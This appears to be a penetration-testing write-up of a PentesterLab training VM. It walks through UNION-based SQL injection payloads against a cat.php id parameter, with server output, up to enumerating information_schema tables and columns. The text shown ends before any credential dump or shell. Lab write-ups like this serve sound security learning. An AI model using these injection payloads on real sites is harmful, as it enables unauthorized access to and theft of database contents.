From MySQL to shell: penetration testing notes
Target: http://192.168.128.128/

http://192.168.128.128/cat.php?id=1%27
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
(a single quote in id breaks the query and the raw MySQL error is echoed: the parameter is injectable and errors are visible in the response)

telnet 192.168.128.128 80
http://192.168.128.128/cat.php?id=2%20order%20by%203#
displays normally
http://192.168.128.128/cat.php?id=2%20order%20by%204#
displays normally
http://192.168.128.128/cat.php?id=2%20order%20by%205#
Unknown column '5' in 'order clause'
(ORDER BY 4 works and ORDER BY 5 fails, so the original SELECT returns 4 columns; note that an unencoded # in a browser URL is a fragment and is never sent to the server, so use %23 when the comment is actually needed; here the query ends right after id, so it works either way)

http://192.168.128.128/cat.php?id=2%20union%20select%201,2,3,4
page renders fully (the UNION with 4 columns is accepted)
http://192.168.128.128/cat.php?id=2%20union%20select%201,2,3,4,5
The used SELECT statements have a different number of columns
http://192.168.128.128/cat.php?id=2%20union%20select%20user(),database(),version(),4
page renders fully, but user() etc. do not appear
http://192.168.128.128/cat.php?id=1%20union%20select%20user(),database(),@@version,current_user()
page renders fully, but user() etc. do not appear
http://192.168.128.128/cat.php?id=1%20union%20select%201,user(),3,4
picture: pentesterlab@localhost
http://192.168.128.128/cat.php?id=1%20union%20select%201,database(),3,4
picture: photoblog
http://192.168.128.128/cat.php?id=1%20union%20select%201,version(),3,4
picture: 5.1.63-0+squeeze1
http://192.168.128.128/cat.php?id=1%20union%20select%201,current_user(),3,4
picture: pentesterlab@localhost
(only the second column of the SELECT is reflected in the page, as a picture title; a value placed in column 1, 3 or 4 is never shown, which is why the first two attempts displayed nothing)
http://192.168.128.128/cat.php?id=1%20union%20select%201,tablename,3,4%20from%20information_schema.tables
Unknown column 'tablename' in 'field list'
(the column is table_name, with an underscore)
http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.tables
One picture entry per row of information_schema.tables (the page shows each name twice, lowercase and uppercase; listed once here):
character_sets, collations, collation_character_set_applicability, columns, column_privileges, engines, events, files, global_status, global_variables, key_column_usage, partitions, plugins, processlist, profiling, referential_constraints, routines, schemata, schema_privileges, session_status, session_variables, statistics, tables, table_constraints, table_privileges, triggers, user_privileges, views, categories, pictures, users
(the query is not restricted to the current schema, so the 28 information_schema tables come first; the application's own tables are categories, pictures and users)
http://192.168.128.128/cat.php?id=1%20union%20select%201,column_name,3,4%20from%20information_schema.columns
One picture entry per row of information_schema.columns (again shown twice on the page, lowercase and uppercase; listed once here). Because the query is not filtered by table_schema or table_name, the dump walks through every column of information_schema's own tables before reaching the application's:
character_set_name, default_collate_name, description, maxlen, collation_name, id, is_default, is_compiled, sortlen, table_catalog, table_schema, table_name, column_name, ordinal_position, column_default, is_nullable, data_type, character_maximum_length, character_octet_length, numeric_precision, numeric_scale, column_type, column_key, extra, privileges, column_comment, grantee, privilege_type, is_grantable, engine, support, comment, transactions, xa, savepoints,
event_catalog, event_schema, event_name, definer, time_zone, event_body, event_definition, event_type, execute_at, interval_value, interval_field, sql_mode, starts, ends, status, on_completion, created, last_altered, last_executed, event_comment, originator, character_set_client, collation_connection, database_collation,
file_id, file_name, file_type, tablespace_name, logfile_group_name, logfile_group_number, fulltext_keys, deleted_rows, update_count, free_extents, total_extents, extent_size, initial_size, maximum_size, autoextend_size, creation_time, last_update_time, last_access_time, recover_time, transaction_counter, version, row_format, table_rows, avg_row_length, data_length, max_data_length, index_length, data_free, create_time, update_time, check_time, checksum, variable_name, variable_value,
constraint_catalog, constraint_schema, constraint_name, position_in_unique_constraint, referenced_table_schema, referenced_table_name, referenced_column_name, partition_name, subpartition_name, partition_ordinal_position, subpartition_ordinal_position, partition_method, subpartition_method, partition_expression, subpartition_expression, partition_description, partition_comment, nodegroup,
plugin_name, plugin_version, plugin_status, plugin_type, plugin_type_version, plugin_library, plugin_library_version, plugin_author, plugin_description, plugin_license, user, host, db, command, time, state, info, query_id, seq, duration, cpu_user, cpu_system, context_voluntary, context_involuntary, block_ops_in, block_ops_out, messages_sent, messages_received, page_faults_major, page_faults_minor, swaps, source_function, source_file, source_line,
unique_constraint_catalog, unique_constraint_schema, unique_constraint_name, match_option, update_rule, delete_rule, specific_name, routine_catalog, routine_schema, routine_name, routine_type, dtd_identifier, routine_body, routine_definition, external_name, external_language, parameter_style, is_deterministic, sql_data_access, sql_path, security_type, routine_comment, catalog_name, schema_name, default_character_set_name, default_collation_name, non_unique, index_schema, index_name, seq_in_index, collation, cardinality, sub_part, packed, nullable, index_type, table_type, auto_increment, table_collation, create_options